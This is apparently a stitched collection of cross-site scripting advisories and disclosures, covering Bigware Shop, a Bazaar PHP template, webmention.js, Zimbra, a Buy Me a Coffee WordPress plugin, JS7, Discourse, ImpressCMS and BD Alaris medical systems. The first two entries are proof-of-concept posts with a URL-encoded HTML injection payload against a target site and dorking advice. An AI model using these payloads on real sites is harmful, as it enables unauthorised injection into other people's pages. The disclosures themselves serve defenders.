Bigware Shop version 2.3 suffers from a cross site scripting vulnerability.

    ====================================================================================================================================| # Title     : Bigware Shop v2.3 XSS Vulnerability                                                                                || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.2(64-bit)                                             || # Vendor    : http://www.bigware.de/                                                                                             |  | # Dork      :                                                                                                                    |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine [+] Xss /Html inject Use Payload : /main_bigware_39.php?bigPfad=&items_id=67%27%22%28%29%26%25%3Cmarquee%3E%3Cfont%20color=lime%20size=32%3Eindoushka%3C/font%3E%3C/marquee%3E[+] http://target_site/main_bigware_39.php?bigPfad=&items_id=67%27%22%28%29%26%25%3Cmarquee%3E%3Cfont%20color=lime%20size=32%3Eindoushka%3C/font%3E%3C/marquee%3EGreetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

Bigware Shop 2.3 Cross Site Scripting

Bazaar Social Listing Shopping Web PHP Template version 2.3.2 suffers from a cross site scripting vulnerability.

    ====================================================================================================================================| # Title     : Bazaar Social Listing Shopping Web PHP Template v2.3.2 XSS Vulnerability                                           || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.2(32-bit)                                             | | # Vendor    : https://codecanyon.net/item/bazaar-social-listing-shopping-web-php-template/23207913?s_rank=87                     |  | # Dork      : "/ad-info.php?adObjID="                                                                                            |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Create New User Account.[+] Edit your account https://127.0.0.1/egyptdrinkscom/settings.php or Sell an item https://127.0.0.1/egyptdrinkscom/sell-edit-stuff.php[+] Put Your Payload xss/hrml .====Greetings to :=====================================================================================================================jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * djroot.dz * LiquidWorm* Hussin-X *D4NB4R * shadow_00715 * yasMouh     |=======================================================================================================================================

Bazaar Social Listing Shopping Web PHP Template 2.3.2 Cross Site Scripting

webmention.js prior to 0.5.5 is vulnerable to cross-site scripting.

**webmention.js Cross-site Scripting vulnerability**

High severity GitHub Reviewed Published Jul 14, 2023 to the GitHub Advisory Database • Updated Jul 14, 2023

GHSA-r54g-4qq6-chxg: webmention.js Cross-site Scripting vulnerability

Cross-site Scripting (XSS) - DOM in GitHub repository plaidweb/webmention.js prior to 0.5.5.

Expand Up

@@ -188,10 +188,12 @@ A more detailed example:

\* @returns {string}

\*/

function entities(text) {

return text.replace(/&/g, "&amp;")

.replace(/</g, "&lt;")

.replace(/\>/g, "&gt;")

.replace(/"/g, "&quot;");

return text.replace(/\[&<>"\]/g, (tag) \=> ({

'&': '&amp;',

'<': '&lt;',

'>': '&gt;',

'"': '&quot;',

}\[tag\] || tag));

}

  

/\*\*

Expand Down Expand Up

@@ -327,7 +329,7 @@ A more detailed example:

let linktext \= \`(${t("mention")})\`;

if (c.name) {

linkclass \= "name";

linktext \= c.name;

linktext \= entities(c.name);

} else if (c.content && c.content.text) {

linkclass \= "text";

linktext \= extractComment(c);

Expand Down

CVE-2023-3672: XSS mitigation · PlaidWeb/webmention.js@3551b66

Zimbra has warned of a critical zero-day security flaw in its email software that has come under active exploitation in the wild.
"A security vulnerability in Zimbra Collaboration Suite Version 8.8.15 that could potentially impact the confidentiality and integrity of your data has surfaced," the company said in an advisory.
It also said that the issue has been addressed and that it's expected to

Email Security / Vulnerability

Zimbra has warned of a critical zero-day security flaw in its email software that has come under active exploitation in the wild.

"A security vulnerability in Zimbra Collaboration Suite Version 8.8.15 that could potentially impact the confidentiality and integrity of your data has surfaced," the company said in an advisory.

It also said that the issue has been addressed and that it's expected to be delivered in the July patch release. Additional details about the flaw are currently unavailable.

In the interim, it is urging customers to apply a manual fix to eliminate the attack vector -

1.  Take a backup of the file /opt/zimbra/jetty/webapps/zimbra/m/momoveto
2.  Edit this file and go to line number 40
3.  Update the parameter value as: <input name="st" type="hidden" value="${fn:escapeXml(param.st)}"/>
4.  Before the update, the line appeared as: <input name="st" type="hidden" value="${param.st}"/>

While the company did not disclose details of active exploitation, Google Threat Analysis Group (TAG) researcher Maddie Stone said it discovered the cross-site scripting (XSS) flaw being abused in the wild as part of a targeted attack. TAG researcher Clément Lecigne has been credited with discovering and reporting the bug.

UPCOMING WEBINAR

Shield Against Insider Threats: Master SaaS Security Posture Management

Worried about insider threats? We've got you covered! Join this webinar to explore practical strategies and the secrets of proactive security with SaaS Security Posture Management.

Join Today

The disclosure comes as Cisco released patches to remediate a critical flaw in its SD-WAN vManage software (CVE-2023-20214, CVSS score: 9.1) that could allow an unauthenticated, remote attacker to gain read permissions or limited write permissions to the configuration of an affected Cisco SD-WAN vManage instance.

"A successful exploit could allow the attacker to retrieve information from and send information to the configuration of the affected Cisco vManage instance," the company said. "A successful exploit could allow the attacker to retrieve information from and send information to the configuration of the affected Cisco vManage instance."

The vulnerability has been addressed in versions 20.6.3.4, 20.6.4.2, 20.6.5.5, 20.9.3.2, 20.10.1.2, and 20.11.1.2. The networking equipment major said it's not aware of any malicious use of the flaw.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Zimbra Warns of Critical Zero-Day Flaw in Email Software Amid Active Exploitation

The "Buy Me a Coffee – Button and Widget Plugin" plugin for WordPress is vulnerable to Cross-Site Scripting in versions up to, and including, 3.6 due to insufficient sanitization and escaping on the 'text value set via the bmc_post_reception action. This makes it possible for authenticated attackers, with subscriber-level permissions, and above to inject arbitrary web scripts into pages that execute whenever a victim accesses a page with the injected scripts.

1<?php23/\*\*4 \* The file that defines the core plugin class5 \*6 \* A class definition that includes attributes and functions used across both the7 \* public-facing side of the site and the admin area.8 \*9 \* @link       https://www.buymeacoffee.com10 \* @since      1.0.011 \*12 \* @package    Buy\_Me\_A\_Coffee13 \* @subpackage Buy\_Me\_A\_Coffee/includes14 \*/1516/\*\*17 \* The core plugin class.18 \*19 \* This is used to define internationalization, admin-specific hooks, and20 \* public-facing site hooks.21 \*22 \* Also maintains the unique identifier of this plugin as well as the current23 \* version of the plugin.24 \*25 \* @since      1.0.026 \* @package    Buy\_Me\_A\_Coffee27 \* @subpackage Buy\_Me\_A\_Coffee/includes28 \* @author     Buymeacoffee <hello@buymeacoffee.com>29 \*/30class Buy\_Me\_A\_Coffee31{3233    /\*\*34     \* The loader that's responsible for maintaining and registering all hooks that power35     \* the plugin.36     \*37     \* @since    1.0.038     \* @access   protected39     \* @var      Buy\_Me\_A\_Coffee\_Loader    $loader    Maintains and registers all hooks for the plugin.40     \*/41    protected $loader;4243    /\*\*44     \* The unique identifier of this plugin.45     \*46     \* @since    1.0.047     \* @access   protected48     \* @var      string    $plugin\_name    The string used to uniquely identify this plugin.49     \*/50    protected $plugin\_name;5152    /\*\*53     \* The current version of the plugin.54     \*55     \* @since    1.0.056     \* @access   protected57     \* @var      string    $version    The current version of the plugin.58     \*/59    protected $version;6061    /\*\*62     \* Define the core functionality of the plugin.63     \*64     \* Set the plugin name and the plugin version that can be used throughout the plugin.65     \* Load the dependencies, define the locale, and set the hooks for the admin area and66     \* the public-facing side of the site.67     \*68     \* @since    1.0.069     \*/70    public function \_\_construct()71    {72        if (defined('PLUGIN\_NAME\_VERSION')) {73            $this\->version \= PLUGIN\_NAME\_VERSION;74        } else {75            $this\->version \= '1.0.0';76        }77        $this\->plugin\_name \= 'buy-me-a-coffee';7879        $this\->load\_dependencies();80        $this\->set\_locale();81        $this\->define\_admin\_hooks();82        $this\->define\_public\_hooks();83    }8485    /\*\*86     \* Load the required dependencies for this plugin.87     \*88     \* Include the following files that make up the plugin:89     \*90     \* - Buy\_Me\_A\_Coffee\_Loader. Orchestrates the hooks of the plugin.91     \* - Buy\_Me\_A\_Coffee\_i18n. Defines internationalization functionality.92     \* - Buy\_Me\_A\_Coffee\_Admin. Defines all hooks for the admin area.93     \* - Buy\_Me\_A\_Coffee\_Public. Defines all hooks for the public side of the site.94     \*95     \* Create an instance of the loader which will be used to register the hooks96     \* with WordPress.97     \*98     \* @since    1.0.099     \* @access   private100     \*/101    private function load\_dependencies()102    {103104        /\*\*105         \* The class responsible for orchestrating the actions and filters of the106         \* core plugin.107         \*/108        require\_once plugin\_dir\_path(dirname(\_\_FILE\_\_)) . 'includes/class-buy-me-a-coffee-loader.php';109110        /\*\*111         \* The class responsible for defining internationalization functionality112         \* of the plugin.113         \*/114        require\_once plugin\_dir\_path(dirname(\_\_FILE\_\_)) . 'includes/class-buy-me-a-coffee-i18n.php';115116        /\*\*117         \* The class responsible for defining all actions that occur in the admin area.118         \*/119        require\_once plugin\_dir\_path(dirname(\_\_FILE\_\_)) . 'admin/class-buy-me-a-coffee-admin.php';120121        require\_once plugin\_dir\_path(dirname(\_\_FILE\_\_)) . 'admin/partials/buy-me-a-cofee-widget.php';122123        require\_once plugin\_dir\_path(dirname(\_\_FILE\_\_)) . 'admin/partials/buy-me-a-coffee-admin-display.php';124125126127        /\*\*128         \* The class responsible for defining all actions that occur in the public-facing129         \* side of the site.130         \*/131        require\_once plugin\_dir\_path(dirname(\_\_FILE\_\_)) . 'public/class-buy-me-a-coffee-public.php';132133134135        $this\->loader \= new Buy\_Me\_A\_Coffee\_Loader();136    }137138    /\*\*139     \* Define the locale for this plugin for internationalization.140     \*141     \* Uses the Buy\_Me\_A\_Coffee\_i18n class in order to set the domain and to register the hook142     \* with WordPress.143     \*144     \* @since    1.0.0145     \* @access   private146     \*/147    private function set\_locale()148    {149150        $plugin\_i18n \= new Buy\_Me\_A\_Coffee\_i18n();151152        $this\->loader\->add\_action('plugins\_loaded', $plugin\_i18n, 'load\_plugin\_textdomain');153    }154155    /\*\*156     \* Register all of the hooks related to the admin area functionality157     \* of the plugin.158     \*159     \* @since    1.0.0160     \* @access   private161     \*/162    private function define\_admin\_hooks()163    {164165        $plugin\_admin \= new Buy\_Me\_A\_Coffee\_Admin($this\->get\_plugin\_name(), $this\->get\_version());166167        $this\->loader\->add\_action('admin\_enqueue\_scripts', $plugin\_admin, 'enqueue\_styles');168        $this\->loader\->add\_action('admin\_enqueue\_scripts', $plugin\_admin, 'enqueue\_scripts');169170        $this\->loader\->add\_action('admin\_post\_bmc\_post\_reception', $plugin\_admin, 'recieve\_post');171172        $this\->loader\->add\_action('admin\_post\_bmc\_disconnect', $plugin\_admin, 'bmc\_disconnect');173174        $this\->loader\->add\_action('admin\_post\_bmc\_name\_post', $plugin\_admin, 'name\_post');175176        $this\->loader\->add\_action('admin\_post\_bmc\_widget\_post', $plugin\_admin, 'widget\_post');177178        // Menu on admin dashboards179        $this\->loader\->add\_action('admin\_menu', $plugin\_admin, 'bmc\_menu');180181        $this\->loader\->add\_action('widgets\_init', $plugin\_admin, 'bmc\_register\_plugin');182183        $this\->loader\->add\_action('activated\_plugin', $plugin\_admin, 'bmc\_activation\_redirect');184    }185186    /\*\*187     \* Register all of the hooks related to the public-facing functionality188     \* of the plugin.189     \*190     \* @since    1.0.0191     \* @access   private192     \*/193    private function define\_public\_hooks()194    {195196        $plugin\_public \= new Buy\_Me\_A\_Coffee\_Public($this\->get\_plugin\_name(), $this\->get\_version());197198        $this\->loader\->add\_action('wp\_enqueue\_scripts', $plugin\_public, 'enqueue\_styles');199        $this\->loader\->add\_action('wp\_enqueue\_scripts', $plugin\_public, 'enqueue\_scripts');200    }201202    /\*\*203     \* Run the loader to execute all of the hooks with WordPress.204     \*205     \* @since    1.0.0206     \*/207    public function run()208    {209        $this\->loader\->run();210    }211212    /\*\*213     \* The name of the plugin used to uniquely identify it within the context of214     \* WordPress and to define internationalization functionality.215     \*216     \* @since     1.0.0217     \* @return    string    The name of the plugin.218     \*/219    public function get\_plugin\_name()220    {221        return $this\->plugin\_name;222    }223224    /\*\*225     \* The reference to the class that orchestrates the hooks with the plugin.226     \*227     \* @since     1.0.0228     \* @return    Buy\_Me\_A\_Coffee\_Loader    Orchestrates the hooks of the plugin.229     \*/230    public function get\_loader()231    {232        return $this\->loader;233    }234235    /\*\*236     \* Retrieve the version number of the plugin.237     \*238     \* @since     1.0.0239     \* @return    string    The version number of the plugin.240     \*/241    public function get\_version()242    {243        return $this\->version;244    }245}

CVE-2023-2082: class-buy-me-a-coffee.php in buymeacoffee/trunk/includes – WordPress Plugin Repository

JS7 is an Open Source Job Scheduler. Users specify file names when uploading files holding user-generated documentation for JOC Cockpit. Specifically crafted file names allow an XSS attack to inject code that is executed with the browser. Risk of the vulnerability is considered high for branch 1.13 of JobScheduler (JS1). The vulnerability does not affect branch 2.x of JobScheduler (JS7) for releases after 2.1.0. The vulnerability is resolved with release 1.13.19.

**Impact**

Users specify file names when uploading files holding user-generated documentation for JOC Cockpit. Specifically crafted file names allow an XSS attack to inject code that is executed with the browser.

Risk Mitigation: Risk of the vulnerability is considered high for branch 1.13 of JobScheduler (JS1). The vulnerability does not affect branch 2.x of JobScheduler (JS7) for releases after 2.1.0.

**Patches**

The vulnerability is resolved with release 1.13.19.

**Workarounds**

Modify an existing jetty-rewrite.xml file as indicated from the below reference.  
Consider instructions available from the below references that apply to releases 1.13.11 throughout 1.13.18.

**References**

https://change.sos-berlin.com/browse/SET-226

CVE-2023-37272: XSS vulnerability in JOC Cockpit branch 1.13

Discourse is an open source discussion platform. A CSP (Content Security Policy) nonce reuse vulnerability could allow XSS attacks to bypass CSP protection. There are no known XSS vectors at the moment, but should one be discovered, this vulnerability would allow the XSS attack to completely bypass CSP. The vulnerability is patched in the latest tests-passed, beta and stable branches.


**Package**

Discourse (Discourse)

**Affected versions**

stable <= 3.0.4; beta <= 3.1.0.beta5; tests-passed <= 3.1.0.beta5

**Patched versions**

stable >= 3.0.5; beta >= 3.1.0.beta6; tests-passed >= 3.1.0.beta6

**Description**

**Impact**

A CSP (Content Security Policy) nonce reuse vulnerability could allow XSS attacks to bypass CSP protection. There are no known XSS vectors at the moment, but should one be discovered, this vulnerability would allow the XSS attack to completely bypass CSP.

**Patches**

The vulnerability is patched in the latest tests-passed, beta and stable branches.

**Workarounds**

A workaround to prevent the vulnerability is to disable Google Tag Manager, i.e., unset the gtm container id setting.

CVE-2023-36473: CSP Nonce Reuse Vulnerability

A cross-site scripting (XSS) vulnerability in ImpressCMS v1.4.5 and before allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the `smile_code` parameter of the component `/editprofile.php`.

**ImpressCMS Cross-site Scripting vulnerability**

Moderate severity GitHub Reviewed Published Jul 13, 2023 to the GitHub Advisory Database • Updated Jul 13, 2023

GHSA-667r-p4gg-7m2q: ImpressCMS Cross-site Scripting vulnerability

The firmware update package for the wireless card is not properly signed and can be modified.

1.  Cybersecurity at BD
2.  Bulletin
3.  BD Alaris™ System with Guardrails™ Suite MX

BD communicates with our customers about cybersecurity vulnerabilities to help healthcare providers manage potential risks through awareness and guidance.

This notification provides product security information and recommendations related to security vulnerabilities found within the BD Alaris™ System with Guardrails™ Suite MX, versions 12.1.3 and earlier.

*   

As a routine practice, BD has voluntarily shared these vulnerabilities with the U.S. Food and Drug Administration (FDA), the U.S. Department of Homeland Security Cybersecurity and Infrastructure Security Agency (CISA) and Information Sharing and Analysis Organizations (ISAOs) where BD participates. Read Coordinated Vulnerability Disclosure to learn more about our disclosure process.

The eight security vulnerabilities below are present on the BD Alaris™ System v12.1.3 and earlier versions. All the vulnerabilities in this bulletin were discovered through routine internal security testing, which is part of our software development life cycle. **There have been no reports of these vulnerabilities being exploited.**

BD has performed risk assessments on each vulnerability in accordance with AAMI-TIR57 and ISO 14971 where potential safety impact was possible. For all eight vulnerabilities, it has been determined that the product's existing control measures effectively reduce the probability of harm, and the residual risk is considered acceptable. Remediation and deployment planning for these vulnerabilities is currently in progress. This disclosure will be updated when more information is available.

For additional information, customers may request a copy of the latest BD Alaris™ System Product Security White Paper by visiting the BD Cybersecurity Trust Center.

**BD Alaris™ PCU Model 8015, versions 12.1.3 and earlier** 

1\. CVE-2023-30559 - Wireless Card Firmware Improperly Signed (Medium) 

2\. CVE-2023-30560 - PCU Configuration Lacks Authentication (Medium) 

3\. CVE-2023-30561 - Lack of Cryptographic Security of IUI Bus (Medium)  

**BD Alaris™ Guardrails™ Editor, versions 12.1.2 and earlier** 

4\. CVE-2023-30562 - Lack of Dataset Integrity Checking (Medium) 

**BD Alaris™ Systems Manager, versions 12.3 and earlier**  

5\. CVE-2023-30563 - Stored Cross-Site-Scripting (XSS) on User Import Functionality (High) 

6\. CVE-2023-30564 - Stored Cross-Site-Scripting (XSS) on Device Import Functionality (Medium)  

**CQI Reporter, version 10.17 and earlier (only applicable to customers using CQI Reporter)**  

7\. CVE-2023-30565 - CQI Data Sniffing  (Low) 

**Calculation Services, versions 1.0 and earlier (only applicable to customers currently using Interoperability features)** 

8\. CVE-2018-1285 - Apache Log4Net Calculation Services (Low)  

BD is authorized as a Common Vulnerability and Exposures (CVE) Numbering Authority (CNA) by the CVE® Program. As a CNA, BD is authorized to assign CVE identification numbers to newly discovered vulnerabilities in its software-enabled products, which includes using the Common Weakness Enumeration (CWE™) system to classify vulnerability types and applying the Common Vulnerability Scoring System (CVSS) to communicate vulnerability characteristics and severity. BD assigned the below CVSS scores to these vulnerabilities.

**1\. CVE-2023-30559 - Wireless Card Firmware Improperly Signed**

**Vulnerability Description:** The firmware update package for the wireless card is not properly signed and can be modified.

**CVSS 5.2 (Medium)** CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:H

**Rationale:** Physical access to the BD Alaris™ PCU is required to exploit this vulnerability. The attack complexity is low because no special privileges are required, and user interaction is not required. If exploited, the threat actor would not be able to gain access to other components of the system. There is low impact to the confidentiality and the integrity of the system. However, there is a high impact to the availability of the system.

**2\. CVE-2023-30560 - PCU Configuration Lacks Authentication**

**Vulnerability Description:** The configuration from the PCU can be modified without authentication using physical connection to the PCU.

**CVSS 6.8 (Medium)** CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

**Rationale**: Physical access to the BD Alaris™ PCU is required to exploit this vulnerability. The attack complexity is low because no specialized access conditions or extenuating circumstances are required. Additionally, no special privileges are required, and user interaction is not required. If exploited, the threat actor would not be able to gain access to other components of the system. There is a high impact to confidentiality, integrity and availability.

**3\. CVE-2023-30561 - Lack of Cryptographic Security of IUI Bus**

**Vulnerability Description:** The data flowing between the PCU and its modules is insecure. A threat actor with physical access could potentially read or modify data by attaching a specially crafted device while an infusion is running.

**CVSS 6.1 (Medium)** CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N

**Rationale:** A threat actor would require physical access to the BD Alaris™ PCU via a specially configured device for protocol exploration and exploitation. While the complexity of this exploit is low, significant technical experience is required. No specialized privileges or user interaction is required. If exploited, the threat actor would not be able to gain access to other components of the system. There is a high impact to confidentiality and integrity. However, there is no impact to the availability of the system.

**4\. CVE-2023-30562 - Lack of Dataset Integrity Checking**

**Vulnerability Description:** A GRE dataset file within Systems Manager can be tampered with and distributed to PCUs.

**CVSS 6.7 (Medium)** CVSS:3.1/AV:A/AC:L/PR:L/UI:R/S:U/C:N/I:H/A:H

**Rationale:** A threat actor would require access to an adjacent network to exploit this vulnerability. The attack complexity is low because the attacker only needs to modify certain fields within the system. To modify the file, the threat actor would need to have generalized permissions. System Manager user interaction is required. If exploited, the threat actor would not be able to gain access to other components of the system. There is no impact to the confidentiality of the system. This exploit would impact the integrity of GRE dataset file directly as it would be subject to out-of-band modification. Additionally, any such modification would have the potential of disabling the effective use of downstream PCUs, impacting the overall availability of the system.

**5\. CVE-2023-30563 - Stored Cross-Site Scripting on User Import Functionality**

**Vulnerability Description:** A malicious file could be uploaded into a System Manager User Import Function resulting in a hijacked session.

**CVSS 8.2 (High)** CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N

**Rationale:** A threat actor requires network access to the Systems Manager (SM) application. If no privileges are required on the computer running SM, the complexity of exploiting this vulnerability is low. Systems Manager user interaction is required. If this vulnerability were to be successfully exploited, it could impact other systems containing sensitive information. There is no impact to availability, a low impact to integrity of the SM application and a high impact to confidentiality.

**6\. CVE-2023-30564 - Stored Cross-Site Scripting on Device Import Functionality**

**Vulnerability Description:** Alaris Systems Manager does not perform input validation during the Device Import Function.

**CVSS 6.9 (Medium)** CVSS:3.1/AV:A/AC:L/PR:L/UI:R/S:C/C:H/I:L/A:N

**Rationale:** The threat actor would need to be on an adjacent network to successfully exploit this vulnerability. If there is no requirement for an attacker to be authenticated to the host machine, the attack complexity is low. Any Systems Manager user is required to load a malicious payload. This vulnerability could cause impacts beyond the Systems Manager to other components. There is no impact to availability. However, there is low impact to integrity and high impact to confidentiality.

**7\. CVE-2023-30565 - CQI Data Sniffing**

**Vulnerability Description:** An insecure connection between Systems Manager and CQI Reporter application could expose infusion data to an attacker.

**CVSS Score: 3.5 (Low)** CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N

**Rationale:** A threat actor would require access to an adjacent network to exploit this vulnerability. The attack complexity is low and there are no specialized privileges or user interaction required. If exploited, the threat actor would not be able to gain access to other components of the system. There is a low impact to confidentiality due to data flow access, there are no impacts to integrity or availability.

**8\. CVE-2018-1285 - Apache Log4Net Calculation Services**

**Vulnerability Description:** A lack of input validation within Apache Log4Net (due to an outdated software version) could allow a threat actor to execute malicious commands.

**CVSS Score: 3.0 (Low)** CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:U/C:N/I:L/A:L

**Rationale**: A threat actor would require local access to Systems Manager. An attacker would be required to have elevated privileges after accessing the target system and modify a vulnerable instance of the Log4Net configuration file. User interaction is not required and, if exploited, the threat actor could not make changes to other components of the system. While there is no impact to confidentiality of the application, there is a low impact to both integrity and availability.

BD has assessed the clinical risk and patient safety impact of these vulnerabilities. The following two vulnerabilities have no clinical impact or safety concern at this time:

**CQI Reporter, version 10.17 and earlier (only applicable to customers using CQI Reporter)**

*   **CQI Data Sniffing (CVE-2023-30565)**
    *   Viewing CQI data has no impact to the function of the BD Alaris™ System.

**BD Alaris™ PCU Model 8015, versions 12.1.3 and earlier**

*   **Lack of Cryptographic Security of IUI Bus (CVE-2023-30561)**
    *   For this vulnerability the likelihood of applying a manned, specially crafted device undetected at the bedside has been determined to be reasonably unforeseeable.

The remaining vulnerabilities have the possibility to impact patient safety. However, the potential for harm can only occur if the vulnerability is exploited; there have been no reports of exploitation in any customer environment or clinical setting.

**BD Alaris™ Point-of-Care Unit (PCU) Model 8015, versions 12.1.3 and earlier**

*   **PCU Configuration Lacks Authentication (CVE-2023-30560)**
    *   The BD Alaris™ PCU has one vulnerability that impacts a single PCU and requires physical access to exploit. If exploited, physical access will allow unauthorized tampering and modification of configurations, which may result in a partial or total loss of integrity. Modifications to firmware, datasets, network credentials and log files are possible, which may impact functionality of the Alaris System and require the PCU to be replaced. The system is designed with features to detect integrity failures. Additionally, users must confirm all datasets prior to activation, as stated in the BD Alaris™ User Manual. BD has assessed product control measures and determined that they reduce the probability of harm to improbable.

**BD Alaris™ Guardrails™ Editor, versions 12.1.2 and earlier**

*   **Lack of Dataset Integrity Checking (CVE-2023-30562)**
    *   Guardrails™ Editor has one vulnerability. If exploited, an attacker can pivot from Systems Manager to Guardrails Editor to misconfigure the dataset. This may result in the inadvertent activation of an undesired dataset on the PCU. However, the system is designed with features to detect integrity failures. Additionally, users must confirm all datasets prior to activation, as stated in the BD Alaris™ User Manual. BD has assessed product control measures and determined that they reduce the probability of harm to improbable.

**BD Alaris™ Systems Manager, versions 12.3 and earlier**

*   **Stored Cross-Site-Scripting (XSS) on User Import Functionality (CVE-2023-30563) and Stored Cross-Site-Scripting (XSS) on Device Import Functionality (CVE-2023-30564)**
    *    BD Alaris™ Systems Manager has two vulnerabilities. If either is exploited, limited administrative services, such as importing new datasets, would lead to a minor delay in therapy until restored; however, the PCU will continue to operate as intended with the existing dataset. The system is designed to limit access to the server to authorized personnel through role-based privileges and access control. BD has assessed product control measures and determined that they reduce the probability of harm to improbable.

**BD Alaris™ EMR Interoperability**

*   **Wireless Card Firmware Improperly Signed (CVE-2023-30559) and Apache Log4Net Calculation Services (CVE-2018-1285)**
    *   There are two vulnerabilities that affect customers using BD Alaris™ EMR Interoperability. If exploited, a loss of application or network connectivity could lead to a delay in therapy. The system is designed to allow a clinician to program the infusion manually (standard non-interop programming workflow). The clinician can immediately program the infusion manually after the failure of an Automated Programming Request(APR). Moreover, the system is designed to limit access to the server to authorized personnel through role-based privileges and access control. BD has assessed product control measures and determined that they reduce the probability of harm to improbable.

To further reduce the risk associated with these vulnerabilities, BD recommends customers implement the following mitigations and compensating controls:

**Network Security**

*   Provide appropriate network perimeter security, such as firewalls, or create Access Control Lists (ACL) to limit network traffic from devices to only the required ports on the required endpoints. The PCU only requires access to DNS, DHCP and Systems Manager on port 3613. The PCU does not accept any unsolicited inbound traffic. Segmenting BD Alaris™ PCUs onto their own VLAN to further enhance the security of BD Alaris™ PCUs is highly recommended.
*   Customers should control network access to the Systems Manager server image by restricting external access to only those addresses and ports indicated in Chapter 1 of the Systems Manager Virtual Machine Deployment Guide. Customers should apply SSL certificates from valid Certificate Authorities, per Chapter 9 of the same document.
*   Enable authentication challenge password for network configuration changes, per Chapter 1 of the Alaris System Maintenance Software User Manual.
*   Rotate Wi-Fi network credentials in alignment with customer security policies and NIST SP 800-63, “Digital Identity Guidelines.” See Network Settings within the Alaris System Maintenance User Manual for instructions on how to manage these credentials. Monitor network traffic for unusual or unexpected traffic and activity. In the event the credentials are suspected of being exposed, change the credentials immediately.
*   Utilize MAC filtering to restrict access to only those approved/whitelisted devices necessary to operate on the network segment containing the BD Alaris™ System.

**Software Security**

*   Periodically inspect BD Alaris™ System components to ensure they are running the correct version of software. Software versions can be found using the instructions in Chapter 4 of the Systems Manager User Manual or Section 6.2.10 of the BD Alaris™ PCU and Pump Module Technical Service Manual.

**System Security**

*   Adhere to industry security best practices regarding access control, identification and authorization, personnel security, and physical protection of assets, as recommended by NIST SP 800-171 Rev. 2, “Protecting Controlled Unclassified Information in Nonfederal Systems and Organizations”.
*   Inspect the BD Alaris™ System prior to use for signs of tampering as indicated in the FIPS 140-2 Compliance Instructions for BD Alaris™ System Products Service Manual.

*   NIST SP 800-171 Rev. 2, “Protecting Controlled Unclassified Information in Nonfederal Systems and Organizations” is available at: https://csrc.nist.gov/publications/detail/sp/800-171/rev-2/final
*   NIST SP 800-63, “Digital Identity Guidelines,” is available at: https://pages.nist.gov/800-63-3/
*   For product or site-specific concerns, contact your BD customer support representative.

Tag

#xss